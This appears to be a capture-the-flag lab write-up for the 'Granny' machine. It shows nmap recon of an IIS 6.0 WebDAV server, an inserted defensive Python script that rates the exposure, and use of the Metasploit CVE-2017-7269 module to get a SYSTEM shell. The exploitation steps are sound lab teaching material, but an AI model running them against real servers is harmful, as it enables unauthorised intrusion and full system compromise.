Recon
nmap
We are facing an IIS 6.0 server.
```
└─$ nmap -A -sC -sV -Pn 10.10.10.15
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-ntlm-info:
|   Target_Name: GRANNY
|   NetBIOS_Domain_Name: GRANNY
|   NetBIOS_Computer_Name: GRANNY
|   DNS_Domain_Name: granny
|   DNS_Computer_Name: granny
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Fri, 05 Aug 2022 20:58:55 GMT
|   Server Type: Microsoft-IIS/6.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_  WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
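As an added defender-side example (not part of this writeup or of nmap), the following Python script parses the http-server-header, http-methods and http-webdav-scan lines of a scan like the one above and turns them into a triage finding: WebDAV write methods advertised by an end-of-life IIS build are rated critical. The sample output is constructed from the scan above, and the list of legacy IIS versions and the severity ladder are my own assumptions.

```python
import re

# Constructed sample: the relevant lines of the nmap scan shown in this writeup
# (Microsoft IIS 6.0 with the WebDAV extension enabled).
SAMPLE_NMAP_OUTPUT = """\
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
"""

# WebDAV methods that let a client create, change, move or lock server-side content.
WEBDAV_WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
WEBDAV_METHODS = WEBDAV_WRITE_METHODS | {"PROPFIND", "SEARCH"}  # any of these => WebDAV is on
# IIS releases that are out of support and receive no security fixes (assumed list).
LEGACY_IIS_VERSIONS = {"5.0", "5.1", "6.0"}

def parse_methods(nmap_output):
    """Collect every method listed on the http-methods 'Potentially risky methods'
    line and the http-webdav-scan 'Allowed Methods' line."""
    methods = set()
    for line in nmap_output.splitlines():
        m = re.search(r"(?:Potentially risky methods|Allowed Methods):\s*(.*)$", line)
        if m:
            methods.update(t.upper() for t in re.split(r"[,\s]+", m.group(1)) if t)
    return methods

def parse_iis_version(nmap_output):
    """Return the IIS version from the http-server-header line, or None if absent."""
    m = re.search(r"http-server-header:\s*Microsoft-IIS/([\d.]+)", nmap_output)
    return m.group(1) if m else None

def assess(nmap_output):
    """Turn one host's nmap output into a finding a defender can triage."""
    methods = parse_methods(nmap_output)
    version = parse_iis_version(nmap_output)
    write_methods = sorted(methods & WEBDAV_WRITE_METHODS)
    legacy = version in LEGACY_IIS_VERSIONS
    webdav = bool(methods & WEBDAV_METHODS)
    if webdav and write_methods and legacy:
        severity = "critical"  # writable WebDAV on an unsupported IIS build
    elif webdav and write_methods:
        severity = "high"      # writable WebDAV on a supported build: review who may PUT/MOVE
    elif webdav or legacy:
        severity = "medium"
    else:
        severity = "info"
    return {"iis_version": version, "legacy_iis": legacy, "webdav_enabled": webdav,
            "write_methods": write_methods, "trace_enabled": "TRACE" in methods, "severity": severity}
```

Running `assess(SAMPLE_NMAP_OUTPUT)` on the constructed sample yields a "critical" finding listing the eight write methods, which is the condition an inventory job should page on.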
Vulnerabilities
The -A switch shows that a WebDAV service is enabled on the server. Let's gather more information with nmap's vuln script category.
```
└─$ nmap --script="vuln" -p 80 10.10.10.15
PORT   STATE SERVICE
80/tcp open  http
| http-enum:
|   /_vti_bin/: Frontpage file or folder
|   /postinfo.html: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
|   /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
|   /_vti_bin/shtml.dll: Frontpage file or folder
|   /_vti_bin/shtml.exe: Frontpage file or folder
|_  /images/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-frontpage-login:
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
|     References:
|_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
```
The nmap http-enum script found some interesting directories, /_vti_bin and /_vti_bin/_vti_aut, which nmap labels as FrontPage files and which correspond to the SharePoint service.

Searching for an exploit in Metasploit, we found the windows/iis/iis_webdav_scstoragepathfromurl module.
```
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search webdav IIS 6.0

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow
```
We fill in the module options, trying both SharePoint directories as TARGETURI, and run the exploit.

| Name | Value |
|---|---|
| TARGETURI | /_vti_bin |
| TARGETURI | /_vti_bin/_vti_aut/ |

We are system owner!
```
c:\>whoami
whoami
nt authority\system
```
We can get both user and root flags :)
Tags: Easy, External, WebDav, ASP, Penetration Tester Level 2, Unrestricted File Upload, CVE-2014-4113, Enumeration, IIS, Misconfiguration, CVE-2017-7269, Public Vulnerabilities, CVE Exploitation, CVE-2015-1701